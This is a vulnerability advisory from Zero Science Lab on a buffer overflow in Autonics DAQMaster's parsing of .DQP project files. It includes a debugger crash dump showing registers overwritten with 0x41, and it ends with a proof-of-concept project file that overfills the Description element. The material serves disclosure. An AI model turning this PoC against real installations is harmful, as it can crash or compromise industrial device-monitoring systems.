Autonics DAQMaster 1.7.3 DQP Parsing Buffer Overflow Code Execution

2016-02-01T00:00:00
ID ZSL-2016-5302
Type zeroscience
Reporter Gjoko Krstic
Modified 2016-02-01T00:00:00

Description

Title: Autonics DAQMaster 1.7.3 DQP Parsing Buffer Overflow Code Execution
Advisory ID: ZSL-2016-5302
Type: Local/Remote
Impact: System Access, DoS
Risk: (4/5)
Release Date: 01.02.2016

Summary

DAQMaster is comprehensive device management program that can be used with Autonics thermometers, panel meters, pulse meters, and counters, etc and with Konics recorders, indicators. DAQMaster provides GUI control for easy and convenient management of parameters and multiple device data monitoring.

Description

The vulnerability is caused due to a boundary error in the processing of a project file, which can be exploited to cause a buffer overflow when a user opens e.g. a specially crafted .DQP project file with a large array of bytes inserted in the 'Description' element. Successful exploitation could allow execution of arbitrary code on the affected machine.

--------------------------------------------------------------------------------

(ee8.1ee8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=41414141 ebx=57010748 ecx=02bb9a00 edx=00808080 esi=00000001 edi=00000001 eip=00405d45 esp=0018f59c ebp=0018f91c iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 DAQMaster!TClsValueListShowData$qqrp16GraphicsTBitmapip10TPropValuei+0x41d: 00405d45 8b10 mov edx,dword ptr [eax] ds:002b:41414141=????????
--------------------------------------------------------------------------------

Vendor

Autonics Corporation - <https://www.autonics.com>

Affected Version

1.7.3 (build 2454)
1.7.0 (build 2333)
1.5.0 (build 2117)

Tested On

Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)

Vendor Status

[20.11.2015] Vulnerability discovered.
[26.11.2015] Contact with the vendor.
[31.01.2016] No response from the vendor.
[01.02.2016] Public security advisory released.

PoC

daqmaster_bof.txt

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>

References

[1] <https://www.exploit-db.com/exploits/39393/>
[2] <https://packetstormsecurity.com/files/135547>
[3] <https://cxsecurity.com/issue/WLB-2016020014>
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/110339>

Changelog

[01.02.2016] - Initial release
[02.02.2016] - Added reference [2] and [3]
[05.02.2016] - Added reference [4]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

                                        
                                            
Autonics DAQMaster 1.7.3 DQP Parsing Buffer Overflow Code Execution


Vendor: Autonics Corporation
Product web page: https://www.autonics.com
Affected version: 1.7.3 (build 2454)
                  1.7.0 (build 2333)
                  1.5.0 (build 2117)

Summary: DAQMaster is comprehensive device management program
that can be used with Autonics thermometers, panel meters,
pulse meters, and counters, etc and with Konics recorders,
indicators. DAQMaster provides GUI control for easy and convenient
management of parameters and multiple device data monitoring.

Desc: The vulnerability is caused due to a boundary error in the
processing of a project file, which can be exploited to cause a
buffer overflow when a user opens e.g. a specially crafted .DQP
project file with a large array of bytes inserted in the 'Description'
element. Successful exploitation could allow execution of arbitrary
code on the affected machine.

---------------------------------------------------------------------

(ee8.1ee8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=57010748 ecx=02bb9a00 edx=00808080 esi=00000001 edi=00000001
eip=00405d45 esp=0018f59c ebp=0018f91c iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
DAQMaster!TClsValueListShowData$qqrp16GraphicsTBitmapip10TPropValuei+0x41d:
00405d45 8b10            mov     edx,dword ptr [eax]  ds:002b:41414141=????????

---------------------------------------------------------------------

Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Microsoft Windows 7 Ultimate SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5302
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5302.php


20.11.2015

--


thricer.dqp project PoC:
------------------------

&lt;DAQMaster xmlns="http://www.w3.org/2001/XMLSchema-instance"&gt;
&lt;Project&gt;
 &lt;General&gt;
  &lt;Name&gt;Noname&lt;/Name&gt;
  &lt;Company&gt;&lt;/Company&gt;
  &lt;Worker&gt;&lt;/Worker&gt;
  &lt;Description&gt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...[n]&lt;/Description&gt;
  &lt;DataFolder&gt;C:\Users\zslab\Documents&lt;/DataFolder&gt;
  &lt;DeskLayout&gt;0&lt;/DeskLayout&gt;
  &lt;NameRule&gt;&lt;/NameRule&gt;
  &lt;FileType&gt;0&lt;/FileType&gt;
  &lt;RunMode&gt;0&lt;/RunMode&gt;
  &lt;Schedule Active="0"/&gt;
  &lt;Layout&gt;0&lt;/Layout&gt;
 &lt;/General&gt;
&lt;System/&gt;
&lt;UserTag/&gt;
&lt;DDEServer/&gt;
&lt;WorkSpace WorkSpaceNum="1"&gt;
  &lt;WorkSpace&gt;DAQ WorkSpace&lt;/WorkSpace&gt;
&lt;/WorkSpace&gt;
&lt;UIList/&gt;
&lt;Layout/&gt;
&lt;/Project&gt;
&lt;/DAQMaster&gt;